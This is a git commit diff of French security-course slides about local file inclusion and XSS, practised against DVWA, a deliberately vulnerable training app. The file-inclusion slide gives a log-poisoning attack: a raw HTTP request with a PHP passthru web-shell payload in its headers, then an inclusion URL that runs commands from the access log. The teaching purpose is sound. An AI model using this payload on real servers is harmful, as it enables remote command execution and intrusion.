fix cours

a20d62e0 · Vincent Mazenod · 0c7661a6 · a20d62e0 · a20d62e0
Commit a20d62e0 authored 4 years ago by Vincent Mazenod
--- a/content/slides/1337/md/fi.md
+++ b/content/slides/1337/md/fi.md
@@ -178,9 +178,7 @@ CustomLog /home/mazenovi/logs/dvwa-access.log combined
 * l'utilisateur lié au thread apache a accès en lecture à ce répertoire
-<small>
+[http://dv.wa/vulnerabilities/fi/?page=/home/mazenovi/logs/dvwa-access.log](http://dv.wa/vulnerabilities/fi/?page=/home/mazenovi/logs/dvwa-access.log)
-[http://dv.wa/vulnerabilities/fi/?page=/home/mazenovi/logs/dvwa-access.log](http://dv.wa/vulnerabilities/fi/?page=/home/mazenovi/logs/dvwa-access.lo)
-</small>
 * les logs sont affichés
@@ -201,15 +199,13 @@ $ nc dv.wa 80
 * Entrer manuellement les paramètres suivant
 ```http
-GET /<?php echo passthru($_GET['cmd']); ?> HTTP/1.1
+GET / HTTP/1.1
 Host: dv.wa
-Referer: <?php echo passthru($_GET['cmd2']); ?>
+Referer: <?php echo passthru($_GET['cmd']); ?>
-User-Agent: <?php echo passthru($_GET['cmd3']); ?>
+User-Agent: 1337-webbrowser
 ```
-<small>
 [http://dv.wa/vulnerabilities/fi/?page=/home/mazenovi/logs/dvwa-access.log&cmd=ls](http://dv.wa/vulnerabilities/fi/?page=/home/mazenovi/logs/dvwa-access.log&cmd=ls)
-</small>
 attendre le log rotate en cas d'échec

--- a/content/slides/1337/md/xss.md
+++ b/content/slides/1337/md/xss.md
@@ -8,7 +8,8 @@
 * Affichage de données utilisateur sans validation ou échappement
  * par oubli du développeur
  * par les messages d'erreurs renvoyés par le langage
-    * tentative d'injection de code interprétable par le navigateur de la cible
+* tentative d'injection de code interprétable par le navigateur de la cible
 ### <i class="fa fa-user-secret"></i> Que peut on faire?
@@ -67,11 +68,11 @@ Note:
 ![Bob](images/xss/XSS-bob.png "Bob")  ![Fleche](images/xss/XSS-fleche.png "Fleche") ![Alice](images/xss/XSS-alice1.png "Alice")
-3.Bob envoie l'url du XSS à Alice en l'incitant à cliquer sur un lien forgé **XSS réfléchie**
+3.Bob envoie l'url du XSS à Alice en l'incitant à cliquer sur un lien forgé (**XSS réfléchie**)
 ou
-3.attend simplement qu'elle se connecte une page compromise **XSS stockée**
+3.attend simplement qu'elle se connecte à une page compromise (**XSS stockée**)
 Note:
 - test du XSS souvent alert ... méthode plus discrète notamment pour XSS stored
@@ -82,11 +83,11 @@ Note:
 ![Alice](images/xss/XSS-alice2.png "Alice")  ![Fleche](images/xss/XSS-fleche.png "Fleche") ![Site piégé](images/xss/XSS-sitepiege.png "Site piégé") ![Serveur victime](images/xss/XSS-serveurvictime.png "Serveur victime")
-4.Alice clique sur le lien forgé **XSS réfléchie**
+4.Alice clique sur le lien forgé (**XSS réfléchie**)
 ou
-4.Alice consulte la page compromise et pense avoir à faire à l'originale **XSS stockée**
+4.Alice consulte la page compromise et pense avoir à faire à l'originale (**XSS stockée**)
 ## XSS